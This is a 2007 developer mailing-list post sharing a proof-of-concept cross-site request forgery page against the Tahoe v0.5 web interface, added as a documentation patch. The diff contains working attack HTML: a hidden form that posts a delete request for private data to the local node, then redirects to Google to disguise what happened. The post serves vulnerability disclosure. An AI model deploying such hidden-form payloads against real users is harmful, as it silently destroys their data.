[tahoe-dev] Example XSRF attack.

Nathan nejucomo at gmail.com
Sun Aug 19 17:38:40 PDT 2007


Hi folks,

Since I've only recently learned about XSRF attacks, I have little
practical experience with them.  I suspected the current webapi was
vulnerable to such attacks, but wanted a proof-of-concept.  Here it
is.

One misconception I hope this points out is that Javascript security
constraints are certainly not adequate to rely on.

This example shows how subtle such attacks can be.  In the wild I
would easily miss having launched this attack, and I bet most
security-conscious surfers would also.  I'm not too familiar with HTML
and Javascript, but this attack took me about 20 minutes to write
(including Googling for examples).


Regards,
Nathan

ps: Darcs patch attached, and human readable diff follows:

Sun Aug 19 18:21:38 MDT 2007  nejucomo at gmail.com
  * This example XSRF attack deletes private data.

  It's an html page which describes its own operation.

diff -rN -u old-tahoe/docs/example-xsrf-attack.html
new-tahoe/docs/example-xsrf-attack.html
--- old-tahoe/docs/example-xsrf-attack.html	1969-12-31 17:00:00.000000000 -0700
+++ new-tahoe/docs/example-xsrf-attack.html	2007-08-19 18:29:40.000000000 -0600
@@ -0,0 +1,81 @@
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
+<html>
+  <head>
+    <title>Example XSRF attach against Tahoe v0.5</title>
+  </head>
+
+  <body>
+    <h1>Example XSRF attach against Tahoe v0.5</h1>
+
+    <p>
+      <b>NOTE:</b> This page contains an attack triggered by a link
+      clearly labeled "ATTACK LINK".  Other links should be benign.
+    </p>
+
+    <p>
+      This serves as an example XSRF attack against Tahoe v0.5.  If the
+      requisite conditions are met, then clicking on an innocuous looking
+      link below will delete your private Tahoe contents.
+    </p>
+
+    <p>
+      This example illustrates how stealthy such attacks can be.
+      If successful, the user may easily believe they followed a simple
+      link to Google, when actually they deleted private Tahoe contents.
+    </p>
+
+    <h2>Requisite Conditions</h2>
+    <ol>
+      <li>
+        Your private vdrive has a file named "xsrf/targetdata".
+        (If this example succeeds this path will be deleted!)
+      </li>
+      <li>
+        Your Tahoe node is running with a web interface listening to
+        <a href="http://localhost:8080/">http://localhost:8080/</a>.
+      </li>
+      <li>
+        Your browser has Javascript enabled.
+      </li>
+    </ol>
+
+    <p>
+      Notice, this attack could come from any source (such as another
+      website, or html-enabled email) so long as the browser has Tahoe
+      access.
+    </p>
+
+    <h2>Attack Trigger</h2>
+
+    <p>
+      This paragraph contains a hidden html payload for the attack.
+      <div style="display:none;">
+      <form
+        method="post"
+        name="htmlAttackPayload"
+        action="http://localhost:8080/vdrive/private/xsrf">
+
+        <input type="hidden" name="t" value="delete">
+        <input type="hidden" name="name" value="targetdata">
+        <input type="hidden" name="when_done" value="http://www.google.com">
+      </form>
+      </div>
+    </p>
+
+    <p>
+      If the attack is successful, you should be redirected to www.google.com.
+    </p>
+
+    <p>
+      Click this <a
+      href="javascript:document.htmlAttackPayload.submit();">ATTACK
+      LINK</a> to launch the attack.
+    </p>
+
+    <hr>
+<!-- Created: Sun Aug 19 17:41:32 MDT 2007 -->
+<!-- hhmts start -->
+Last modified: Sun Aug 19 18:21:36 MDT 2007
+<!-- hhmts end -->
+  </body>
+</html>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: xsrf-example.patch
Type: text/x-patch
Size: 38544 bytes
Desc: not available
Url : http://allmydata.org/pipermail/tahoe-dev/attachments/20070819/54aa30d1/attachment-0001.bin 


More information about the tahoe-dev mailing list